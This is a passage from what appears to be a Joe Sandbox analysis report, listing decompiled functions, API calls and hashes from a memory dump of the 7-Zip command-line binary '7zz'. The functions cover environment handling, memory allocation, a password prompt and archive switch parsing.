Download Yara Rule

C-Code - Quality: 100%

			E00470AD6() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x493840; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = L0046BFC5(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E0046C5C0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = L0046BFC5(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0046C0FF(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x493840 = 2;
					goto L18;
				}
				 *0x493840 = 1;
				goto L6;
			}

0x00470ad8
0x00470ae7
0x00470ae9
0x00470aeb
0x00470aef
0x00470b27
0x00470bb1
0x00470bff
0x00000000
0x00470bff
0x00470bb3
0x00470bb5
0x00470bc3
0x00470bc5
0x00470bc7
0x00470bd3
0x00470bd6
0x00470bde
0x00470be3
0x00470bec
0x00470be5
0x00470be5
0x00470be5
0x00470bf5
0x00000000
0x00000000
0x00000000
0x00000000
0x00470bc9
0x00470bc9
0x00470bc9
0x00470bc9
0x00470bca
0x00470bce
0x00470bcf
0x00000000
0x00470bc9
0x00470bbd
0x00470bc1
0x00000000
0x00000000
0x00000000
0x00470bc1
0x00470b2d
0x00470b2f
0x00470b3d
0x00470b40
0x00470b42
0x00470b52
0x00470b5e
0x00470b65
0x00470b6b
0x00470b6f
0x00470b72
0x00470b7a
0x00470b7e
0x00470b8f
0x00470b95
0x00470b9b
0x00470b9b
0x00470b9f
0x00470b9f
0x00470b7e
0x00470ba4
0x00000000
0x00000000
0x00000000
0x00000000
0x00470b44
0x00470b44
0x00470b44
0x00470b45
0x00470b46
0x00470b4c
0x00470b4d
0x00000000
0x00470b44
0x00470b33
0x00470b37
0x00000000
0x00000000
0x00000000
0x00470b37
0x00470af3
0x00470af7
0x00470b0b
0x00470b0f
0x00000000
0x00000000
0x00470b15
0x00000000
0x00470b15
0x00470af9
0x00000000

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470AF1
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B05
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470B31
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B69
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,0046CFE1), ref: 00470B8B
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,0046CFE1), ref: 00470BA4
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,0046CFE1), ref: 00470BB7
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00470BF5

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: c95006d6c82fd5b4b95bc722174a64074828fd68f564f103238a32f7180be584
Instruction ID: 27e12e20c1ea4b212add3b7eab65f77fdbffab05a40932be5c7e7487a2d6895d
Opcode Fuzzy Hash: c95006d6c82fd5b4b95bc722174a64074828fd68f564f103238a32f7180be584
Instruction Fuzzy Hash: 9C3105B2406255DFE7307FF89C848BBB6DCEA4571C711453BF559C3200EA29BE8182AE

Uniqueness

Uniqueness Score: -1.00%

Function 0046F60A Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046F60A() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x48e148 != 0xffffffff) {
					_t43 = HeapAlloc( *0x496580, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x48e138;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x48e138) {
							HeapFree( *0x496580, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x48e138) {
						 *_t43 = 0x48e138;
						_t25 =  *0x48e13c; // 0x48e138
						 *(_t43 + 4) = _t25;
						 *0x48e13c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x48e138 == 0) {
							 *0x48e138 = 0x48e138;
						}
						if( *0x48e13c == 0) {
							 *0x48e13c = 0x48e138;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E0046CCB0(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

0x0046f615
0x0046f631
0x0046f635
0x00000000
0x00000000
0x00000000
0x0046f617
0x0046f617
0x0046f63b
0x0046f651
0x0046f655
0x0046f730
0x0046f736
0x0046f741
0x0046f741
0x0046f747
0x00000000
0x0046f747
0x0046f66d
0x0046f72a
0x00000000
0x0046f72a
0x0046f67a
0x0046f69a
0x0046f69c
0x0046f6a1
0x0046f6a4
0x0046f6ad
0x0046f67c
0x0046f683
0x0046f685
0x0046f685
0x0046f691
0x0046f693
0x0046f693
0x0046f691
0x0046f6af
0x0046f6b5
0x0046f6bb
0x0046f6be
0x0046f6be
0x0046f6c1
0x0046f6c4
0x0046f6c7
0x0046f6ca
0x0046f6d1
0x0046f6d3
0x0046f6dd
0x0046f6de
0x0046f6e0
0x0046f6e3
0x0046f6e6
0x0046f6f2
0x0046f6fa
0x0046f703
0x0046f70a
0x0046f70d
0x0046f70f
0x0046f716
0x0046f716
0x00000000
0x0046f71e

APIs

HeapAlloc.KERNEL32(00000000,00002020,8H,8H,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000), ref: 0046F62B
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000), ref: 0046F64F
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000), ref: 0046F669
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000,?), ref: 0046F72A
HeapFree.KERNEL32(00000000,00000000,?,?,0046FAD6,00000000,00000010,00000000,00000009,00000009,?,0046C0AF,00000010,00000000,?,00000000), ref: 0046F741

Strings

8H, xrefs: 0046F613, 0046F614, 0046F617, 0046F673, 0046F67C, 0046F685
8H, xrefs: 0046F730
8H, xrefs: 0046F68A, 0046F693, 0046F69C, 0046F6A4

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID: 8H$8H$8H
API String ID: 714016831-3582048164
Opcode ID: 357391c0e2fa0b3f268474b48e736d84afed240d425fe2d70a8c733abae89056
Instruction ID: 4f5feb6fdaf296d9f8f0ee304bd314e411df0013c944c963439ce23b9991a76f
Opcode Fuzzy Hash: 357391c0e2fa0b3f268474b48e736d84afed240d425fe2d70a8c733abae89056
Instruction Fuzzy Hash: EE31C571540701ABE3308F29EC89B2AB7A0E744755F10853BE1D5977E0F778A8498B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004068A1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004068A1(intOrPtr __ecx, void* __edx) {
				void* _t25;
				void* _t41;
				void* _t57;
				void* _t59;

				_t52 = __edx;
				E0046B890(E004735AC, _t59);
				 *(_t59 - 0x14) =  *(_t59 - 0x14) & 0x00000000;
				_t41 = __edx;
				 *((intOrPtr*)(_t59 - 0x18)) = __ecx;
				E00407CD5(__edx, "\nEnter password (will not be echoed):");
				E00407CAC(__edx);
				_t25 = GetStdHandle(0xfffffff6);
				 *(_t59 - 0xd) =  *(_t59 - 0xd) & 0x00000000;
				 *(_t59 - 0x14) =  *(_t59 - 0x14) & 0x00000000;
				_t57 = _t25;
				if(_t57 != 0xffffffff && _t57 != 0 && GetConsoleMode(_t57, _t59 - 0x14) != 0) {
					 *(_t59 - 0xd) = SetConsoleMode(_t57,  *(_t59 - 0x14) & 0x000000fb) != 0;
				}
				_push(_t59 - 0x24);
				E00407B25(0x490aa8, _t52);
				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
				if( *(_t59 - 0xd) != 0) {
					SetConsoleMode(_t57,  *(_t59 - 0x14));
				}
				E00407CD5(_t41, "\n");
				E00407CAC(_t41);
				E004039C0( *((intOrPtr*)(_t59 - 0x18)), _t59 - 0x24);
				E00407A18( *((intOrPtr*)(_t59 - 0x24)));
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return  *((intOrPtr*)(_t59 - 0x18));
			}

0x004068a1
0x004068a6
0x004068ae
0x004068b4
0x004068b6
0x004068c1
0x004068c8
0x004068cf
0x004068d5
0x004068d9
0x004068e3
0x004068e8
0x00406908
0x00406908
0x00406914
0x00406915
0x0040691a
0x00406922
0x00406928
0x00406928
0x00406931
0x00406938
0x00406944
0x0040694c
0x0040695b
0x00406963

APIs

__EH_prolog.LIBCMT ref: 004068A6
GetStdHandle.KERNEL32(000000F6,Enter password (will not be echoed):,?,?), ref: 004068CF
GetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 004068F3
SetConsoleMode.KERNEL32(00000000,00000000,?,?), ref: 00406904
SetConsoleMode.KERNEL32(00000000,00000000,?,?,?), ref: 00406928

Strings

Enter password (will not be echoed):, xrefs: 004068BA

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ConsoleMode$H_prologHandle
String ID: Enter password (will not be echoed):
API String ID: 2048311603-3720017889
Opcode ID: e4ab1c20882cafacc2701a80f49a49620683f374bc4d6d7f7edd82a9960cf4b7
Instruction ID: a8b37ca635c045820d6708ef6ebefb29507d7cb9e32fac769124ac422c1f2311
Opcode Fuzzy Hash: e4ab1c20882cafacc2701a80f49a49620683f374bc4d6d7f7edd82a9960cf4b7
Instruction Fuzzy Hash: 1111C671E051099BDB10ABA5CC45BEE77789F44329F10057EE406B22C1CB3C5E1487AA

Uniqueness

Uniqueness Score: -1.00%

Function 00406564 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00406564(void* __ecx) {
				void* _t15;
				void* _t18;
				void* _t29;
				void* _t31;

				E0046B890(E00473524, _t31);
				_push(__ecx);
				_t29 = __ecx;
				 *(_t31 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				if( *((char*)(_t29 + 0x39)) == 0) {
					_t18 = _t29 + 8;
					if( *((char*)(_t31 + 0xc)) == 0) {
						_push("Compressing  ");
					} else {
						_push("Anti item    ");
					}
					E0040608D(_t18);
					_t13 =  *((intOrPtr*)(_t31 + 8));
					if( *((short*)( *((intOrPtr*)(_t31 + 8)))) == 0) {
						_t13 =  *0x48b344; // 0x48b388
					}
					E004060A5(_t18, _t13);
					if( *((char*)(_t29 + 0x38)) != 0) {
						E004060D4(_t18);
					}
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				} else {
					LeaveCriticalSection(0x490a88);
					_t15 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t15;
			}

0x00406569
0x0040656e
0x00406576
0x00406579
0x0040657c
0x00406582
0x0040658a
0x0040659c
0x0040659f
0x004065a8
0x004065a1
0x004065a1
0x004065a1
0x004065af
0x004065b4
0x004065bb
0x004065bd
0x004065bd
0x004065c5
0x004065ce
0x004065d2
0x004065d2
0x004065d8
0x004065de
0x0040658c
0x0040658d
0x00406593
0x00406593
0x004065e6
0x004065ee

APIs

__EH_prolog.LIBCMT ref: 00406569
EnterCriticalSection.KERNEL32(00490A88), ref: 0040657C
LeaveCriticalSection.KERNEL32(00490A88), ref: 0040658D
LeaveCriticalSection.KERNEL32(00490A88), ref: 004065D8

Strings

Compressing , xrefs: 004065A8
Anti item , xrefs: 004065A1

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$Leave$EnterH_prolog
String ID: Anti item $Compressing
API String ID: 2532973370-3992608634
Opcode ID: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
Instruction ID: 580c09916b0a3b3df052708d1afcafaf12a43b80893965563734f36f16cd3c83
Opcode Fuzzy Hash: a4d77a2cb10ab5a3c8563fdb07b5886aea9a05d8824471b2f091ec8e7e6115ac
Instruction Fuzzy Hash: 6D01B571A00244BFDB21EF25DC85B6EB7E4AF49314F01483FE047A65D1C7BC99548769

Uniqueness

Uniqueness Score: -1.00%

Function 004256CE Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004256CE(void* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t153;
				signed int _t155;
				signed int _t158;
				intOrPtr* _t160;
				signed int* _t161;
				void* _t163;
				signed int _t178;
				signed int _t182;
				signed int* _t183;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t209;
				signed int _t213;
				intOrPtr* _t218;
				signed int _t220;
				void* _t223;
				intOrPtr _t236;
				signed int _t237;
				void* _t273;
				signed int* _t299;
				intOrPtr _t306;
				intOrPtr _t307;
				signed int _t313;
				signed int _t315;
				void* _t316;

				E0046B890(E004765A8, _t316);
				_t311 = __ecx;
				E00403532(_t316 - 0x20,  *((intOrPtr*)(_t316 + 8)));
				_t305 = 0;
				 *((intOrPtr*)(_t316 - 4)) = 0;
				E00407ED0( *((intOrPtr*)(_t316 - 0x20)));
				if( *(_t316 - 0x1c) != 0) {
					_t228 =  *((intOrPtr*)(_t316 - 0x20));
					_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t316 - 0x20))));
					__eflags = _t148 - 0x58;
					if(_t148 != 0x58) {
						__eflags = _t148 - 0x53;
						if(_t148 != 0x53) {
							_t149 = E00408053(_t228, L"CRC");
							__eflags = _t149;
							if(_t149 != 0) {
								_t220 = E004263BA(_t316 - 0x20, _t316 - 0x10);
								E004072C9(_t316 - 0x20, _t316 - 0x2c, _t220);
								__eflags = _t220;
								 *((char*)(_t316 - 4)) = 1;
								if(_t220 != 0) {
									L42:
									__eflags =  *(_t316 - 0x10) - 0x2710;
									if( *(_t316 - 0x10) <= 0x2710) {
										_t153 =  *((intOrPtr*)(_t311 + 0x44));
										__eflags =  *(_t316 - 0x10) - _t153;
										if( *(_t316 - 0x10) >= _t153) {
											_t306 =  *((intOrPtr*)(_t311 + 0x10));
											 *(_t316 - 0x10) =  *(_t316 - 0x10) - _t153;
											__eflags = _t306 -  *(_t316 - 0x10);
											if(_t306 >  *(_t316 - 0x10)) {
												L49:
												_t307 =  *((intOrPtr*)( *((intOrPtr*)(_t311 + 0x14)) +  *(_t316 - 0x10) * 4));
												__eflags =  *(_t316 - 0x28);
												 *((intOrPtr*)(_t316 - 0x14)) = _t307;
												if( *(_t316 - 0x28) != 0) {
													_t155 = E00425B6E(_t316 - 0x2c);
													__eflags = _t155;
													if(_t155 < 0) {
														L60:
														E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														E00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = 0x80070057;
														goto L73;
													}
													 *((short*)(_t316 - 0x48)) = 0;
													 *((short*)(_t316 - 0x46)) = 0;
													_t160 = 0x48c9b0 + (_t155 + _t155 * 2) * 4;
													_t236 =  *_t160;
													 *((char*)(_t316 - 4)) = 7;
													__eflags = _t236 - 4;
													 *((intOrPtr*)(_t316 - 0x50)) = _t236;
													if(_t236 == 4) {
														L61:
														_t161 =  *(_t160 + 8);
														_t237 = 0;
														__eflags = 0;
														while(1) {
															__eflags =  *_t161;
															if( *_t161 == 0) {
																break;
															}
															_t237 = _t237 + 1;
															_t161 =  &(_t161[0]);
														}
														_t163 = E004072C9(_t316 - 0x2c, _t316 - 0x38, _t237);
														_push(_t316 + 8);
														 *((char*)(_t316 - 4)) = 8;
														_t305 = E00426261(_t163,  *(_t316 + 0xc), _t311);
														 *((char*)(_t316 - 4)) = 7;
														E00407A18( *((intOrPtr*)(_t316 - 0x38)));
														__eflags = _t305;
														if(_t305 == 0) {
															E0040C1A0(_t316 - 0x48,  *((intOrPtr*)(_t316 + 8)));
															__eflags =  *(_t316 - 0x10) -  *((intOrPtr*)(_t311 + 0x50));
															if( *(_t316 - 0x10) <=  *((intOrPtr*)(_t311 + 0x50))) {
																 *((intOrPtr*)(_t311 + 0x4c)) =  *((intOrPtr*)(_t316 + 8));
															}
															L69:
															_push(_t316 - 0x50);
															E00425C04( *((intOrPtr*)(_t316 - 0x14)));
															 *((char*)(_t316 - 4)) = 1;
															E0040C20F(_t316 - 0x48);
															L70:
															_t313 = 0;
															__eflags = 0;
															L71:
															E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
															goto L72;
														}
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														L66:
														E00407A18( *((intOrPtr*)(_t316 - 0x2c)));
														E00407A18( *((intOrPtr*)(_t316 - 0x20)));
														_t158 = _t305;
														goto L73;
													}
													__eflags = _t236 - 1;
													if(_t236 == 1) {
														goto L61;
													}
													__eflags = _t236 - 2;
													if(_t236 == 2) {
														goto L61;
													}
													_t178 = E0042518A(_t316 - 0x2c);
													__eflags = _t178;
													if(_t178 < 0) {
														L59:
														 *((char*)(_t316 - 4)) = 1;
														E0040C20F(_t316 - 0x48);
														goto L60;
													}
													_t180 = _t178 + _t178 * 2;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													 *((intOrPtr*)(_t316 - 0x50)) =  *((intOrPtr*)(0x48c9b0 + (_t178 + _t178 * 2) * 4));
													asm("movsd");
													_t182 = E00425124( *((intOrPtr*)(0x48c9b0 + _t180 * 4 + 4)), _t316 - 0x48);
													__eflags = _t182;
													if(_t182 != 0) {
														goto L69;
													}
													goto L59;
												}
												_t183 =  *(_t316 + 0xc);
												__eflags =  *_t183 - 8;
												if( *_t183 != 8) {
													goto L45;
												}
												E00403532(_t316 - 0x38, _t183[2]);
												_push(_t316 - 0x38);
												_push(_t307);
												 *((char*)(_t316 - 4)) = 6;
												_t313 = E004251BA(_t311, __eflags);
												E00407A18( *((intOrPtr*)(_t316 - 0x38)));
												__eflags = _t313;
												if(_t313 == 0) {
													goto L70;
												}
												goto L71;
											}
											_t223 = _t311 + 8;
											do {
												E00405B9F(_t316 - 0x58);
												 *((intOrPtr*)(_t316 - 0x58)) = 0x47b178;
												 *((char*)(_t316 - 4)) = 4;
												E0040351A(_t316 - 0x44);
												_push(_t316 - 0x58);
												 *((char*)(_t316 - 4)) = 5;
												E00425C5B(_t223, _t306);
												 *((char*)(_t316 - 4)) = 1;
												E00422D4A(_t316 - 0x58);
												_t306 = _t306 + 1;
												__eflags = _t306 -  *(_t316 - 0x10);
											} while (_t306 <=  *(_t316 - 0x10));
											goto L49;
										}
										L45:
										_t313 = 0x80070057;
										goto L71;
									}
									_t313 = 0x80004005;
									goto L71;
								}
								E00407399(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 2;
								_t195 = E0040807A(0x48c4a8);
								__eflags = _t195;
								 *((char*)(_t316 - 4)) = 1;
								E00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t220 & 0xffffff00 | _t195 == 0x00000000;
								if((_t220 & 0xffffff00 | _t195 == 0x00000000) == 0) {
									_t197 = E0040807A(L"RSFX");
									__eflags = _t197;
									if(_t197 != 0) {
										_t198 = E0040807A("F");
										__eflags = _t198;
										if(_t198 != 0) {
											_t199 = E0040807A(L"HC");
											__eflags = _t199;
											if(_t199 != 0) {
												_t200 = E0040807A(L"HCF");
												__eflags = _t200;
												if(_t200 != 0) {
													_t201 = E0040807A(L"HE");
													__eflags = _t201;
													if(_t201 != 0) {
														_t202 = E0040807A(L"TC");
														__eflags = _t202;
														if(_t202 != 0) {
															_t203 = E0040807A(L"TA");
															__eflags = _t203;
															if(_t203 != 0) {
																_t204 = E0040807A(L"TM");
																__eflags = _t204;
																if(_t204 != 0) {
																	_t205 = E0040807A(0x48bb98);
																	__eflags = _t205;
																	if(_t205 != 0) {
																		 *(_t316 - 0x10) = 0;
																		goto L42;
																	}
																	_t299 =  *(_t316 + 0xc);
																	_t273 = _t311 + 0x40;
																	L34:
																	_t206 = E0042633E(_t273, _t299);
																	L30:
																	_t313 = _t206;
																	goto L71;
																}
																_t299 =  *(_t316 + 0xc);
																_t273 = _t311 + 0x37;
																goto L34;
															}
															_t299 =  *(_t316 + 0xc);
															_t273 = _t311 + 0x36;
															goto L34;
														}
														_t299 =  *(_t316 + 0xc);
														_t273 = _t311 + 0x35;
														goto L34;
													}
													_t206 = E0042633E(_t311 + 0x34,  *(_t316 + 0xc));
													__eflags = _t206;
													if(_t206 == 0) {
														 *((char*)(_t311 + 0x33)) = 1;
														goto L70;
													}
													goto L30;
												}
												 *((char*)(_t316 + 0xb)) = 1;
												_t207 = E0042633E(_t316 + 0xb,  *(_t316 + 0xc));
												__eflags = _t207;
												if(_t207 == 0) {
													__eflags =  *((char*)(_t316 + 0xb));
													if( *((char*)(_t316 + 0xb)) == 0) {
														_t305 = 0x80070057;
													}
												} else {
													_t305 = _t207;
												}
												goto L66;
											}
											_t299 =  *(_t316 + 0xc);
											_t273 = _t311 + 0x32;
											goto L34;
										}
										_t299 =  *(_t316 + 0xc);
										_t273 = _t311 + 0x38;
										goto L34;
									}
									_t299 =  *(_t316 + 0xc);
									_t273 = _t311 + 0x1c;
									goto L34;
								}
								_t209 = E004072C9(_t316 - 0x20, _t316 - 0x38, 2);
								 *((char*)(_t316 - 4)) = 3;
								_t313 = E004263EB(_t209,  *(_t316 + 0xc),  *((intOrPtr*)(_t311 + 0x48)), _t311);
								E00407A18( *((intOrPtr*)(_t316 - 0x38)));
								__eflags = _t313;
								if(_t313 != 0) {
									goto L71;
								}
								goto L70;
							}
							_t315 = __ecx + 4;
							__eflags = _t315;
							 *_t315 = 4;
							E004075A5(_t316 - 0x20, 0, 3);
							_push(_t315);
							goto L12;
						}
						E004075A5(_t316 - 0x20, 0, 1);
						__eflags =  *(_t316 - 0x1c);
						if( *(_t316 - 0x1c) != 0) {
							__eflags =  *( *(_t316 + 0xc));
							if( *( *(_t316 + 0xc)) != 0) {
								goto L1;
							}
							_push(_t316 - 0x20);
							_t213 = E0042547B(__ecx);
						} else {
							_push( *(_t316 + 0xc));
							_t213 = E00425585(__ecx);
						}
						goto L7;
					} else {
						E004075A5(_t316 - 0x20, 0, 1);
						_t218 = __ecx + 0x3c;
						_push(_t218);
						 *_t218 = 9;
						L12:
